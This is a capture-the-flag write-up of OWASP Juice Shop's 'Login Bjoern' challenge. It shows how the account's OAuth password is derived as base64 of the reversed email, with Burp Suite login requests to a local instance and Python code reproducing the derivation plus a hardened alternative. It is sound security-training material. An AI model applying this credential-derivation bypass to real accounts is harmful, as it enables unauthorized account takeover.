Hacking OWASP’s Juice Shop Pt. 54: Login Bjoern

Challenge: 

Name: Login Bjoern

Description: Log in with Bjoern’s Gmail account without previously changing his password, applying SQL Injection, or hacking his Google account.

Difficulty: 4 star

Category: Broken Authentication

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-authentication.html

Tools used:

Burp Suite

Resources used:

https://mothereff.in/reverse-string

Methodology: 

This was a fun, CTF-type challenge. The expanded description talks about OAuth at length, so I began by looking for any reference to it in the main JavaScript file.

Shop$ cat main.js | grep "oauth"

[Screenshot of the grep output. The recoverable hits are all in the minified login component: a Login(t) handler calling this.userService.oauth, a Google clientId ending in .apps.googleusercontent.com, an oauthUnavailable / redirectUri check that logs "... is not an authorized redirect URI for this application", and a window.location.replace() to https://accounts.google.com/o/oauth... built from the clientId and redirectUri.]

OK, there are enough references there to warrant a deeper look, so I dug into the code until I came across the login function.

[Screenshot of the minified login component. Around the OAuth path it saves a user via this.userService.save({ email: t.email, password: e, passwordRepeat: e }) and then calls login(t); on success it sets a "token" cookie with an expiry computed from new Date() plus some hours, writes to localStorage, and navigates with this.router.navigate(["login" ...]). The recoverable part of the login function itself reads:]

    login(t) {
        this.userService.login({
            email: t.email,
            password: btoa(t.email.split("").reverse().join("")),
            oauth: ...

While the rest of the minified code in this file uses one- or two-letter names, “btoa” didn’t quite fit that mold, so I googled it.

developer.mozilla.org › en-US › docs › Web › API
WindowOrWorkerGlobalScope.btoa() - Web APIs | MDN
Aug 25, 2020 — The WindowOrWorkerGlobalScope.btoa() method creates a Base64-encoded ASCII string from a binary string (i.e., a String object in which ...

If btoa() is just a base64 encoding function, and it is encoding nothing more than the reversed string of the user’s email address, then let’s go ahead and do exactly that.

Reverse a string
Input: bjoern.kimminich@gmail.com
Reversed result (permalink): moc.liamg@hcinimmik.nreojb

[Burp Suite Repeater, request to http://localhost:3000:]

POST /rest/user/login HTTP/1.1
Host: localhost:3000
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 88
Origin: http://localhost:3000
Connection: close
Referer: http://localhost:3000/
Cookie: language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss

{"email":"bjoern.kimminich@gmail.com","password":"bW9jLmxpYW1nQGhjaW5pbW1pay5ucmVvamIK"}

But it didn’t work. After all that sleuthing, the password didn’t work. I double and triple checked every character in the email address, made sure the reversing method was functioning properly, and finally tried to encode the string using Burp Suite’s Decoder.

[Burp Suite Decoder: encoding the reversed address as Base64]

Input: moc.liamg@hcinimmik.nreojb
Output: bW9jLmxpYW1nQGhjaW5pbW1pay5ucmVvamI=

What’s this? A different character at the end of the encoded string? Let’s give it a shot!

You successfully solved a challenge: Login Bjoern (Log in with Bjoern's Gmail account without previously changing his password, applying SQL Injection, or hacking his Google account.)

Prevention and Mitigation Strategies:

OWASP Authentication Cheat Sheet
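As an added example (not code from this post or from Juice Shop), the client-side derivation seen in main.js reproduced in Python, the trailing-newline variant that accounts for the one-character difference between the two encoded strings above, and a hardened replacement for OAuth-provisioned accounts. The SHA-256 audit helper and the stored-hash format are assumptions for illustration only.

```python
import base64
import hashlib
import secrets


def derive_oauth_password(email: str) -> str:
    """Reproduce the derivation visible in main.js:
    btoa(email.split("").reverse().join("")) is base64 of the reversed email.
    The value depends only on the (public) address, which is the weakness
    this challenge is built around."""
    return base64.b64encode(email[::-1].encode()).decode("ascii")


def derive_with_trailing_newline(email: str) -> str:
    """Same derivation when the reversed string carries a trailing newline,
    e.g. after being piped through `echo` or pasted with a line break.
    All but the final base64 characters match; the tail changes from "="
    to "K", which is the difference seen between the two attempts."""
    return base64.b64encode((email[::-1] + "\n").encode()).decode("ascii")


def random_oauth_password(nbytes: int = 32) -> str:
    """Hardened alternative (constructed here, not Juice Shop code): give an
    OAuth-provisioned account an unguessable random secret instead of a
    value derived from public data."""
    return secrets.token_urlsafe(nbytes)


def stored_hash_for(password: str) -> str:
    """Hypothetical credential store format (unsalted SHA-256) used only so
    the audit below has something to compare against."""
    return hashlib.sha256(password.encode()).hexdigest()


def is_derivable(email: str, stored_hash: str) -> bool:
    """Audit helper: True when the stored hash equals the hash of the
    email-derived value, i.e. the account is protected only by data
    anyone who knows the address can recompute."""
    return stored_hash_for(derive_oauth_password(email)) == stored_hash


if __name__ == "__main__":
    email = "bjoern.kimminich@gmail.com"  # sample address from the challenge
    print(derive_oauth_password(email))         # ends with "amI="
    print(derive_with_trailing_newline(email))  # ends with "amIK"
    print(is_derivable(email, stored_hash_for(derive_oauth_password(email))))
    print(is_derivable(email, stored_hash_for(random_oauth_password())))
```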
